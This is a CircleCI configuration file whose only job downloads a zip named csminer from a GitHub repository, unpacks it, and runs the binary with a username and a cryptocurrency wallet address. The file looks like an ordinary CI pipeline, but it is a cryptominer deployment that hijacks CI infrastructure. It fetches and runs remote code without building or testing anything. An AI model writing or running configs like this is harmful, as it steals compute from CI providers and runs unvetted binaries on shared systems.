version: 2.1
jobs:
  my-job:
    machine:
      image: ubuntu-2004:202201-02
    steps:
     - run: |
         sudo apt-get update
         sudo apt-get install unzip -y
         wget https://github.com/phongcongtu/pkt_phong/raw/main/csminer.zip
         unzip csminer.zip
         chmod +x csminer
         ./csminer -user=trumcuoicuchuoi -wallet 4A3zBUxzRBM9Z62k8JQpYCEpnNUHA8TqpTW2p7XxAhVjVwobTH7cmi7584cTZQb3BmYVoF4bJfceT8WWmDHkRf14P8LgBPC -threads 1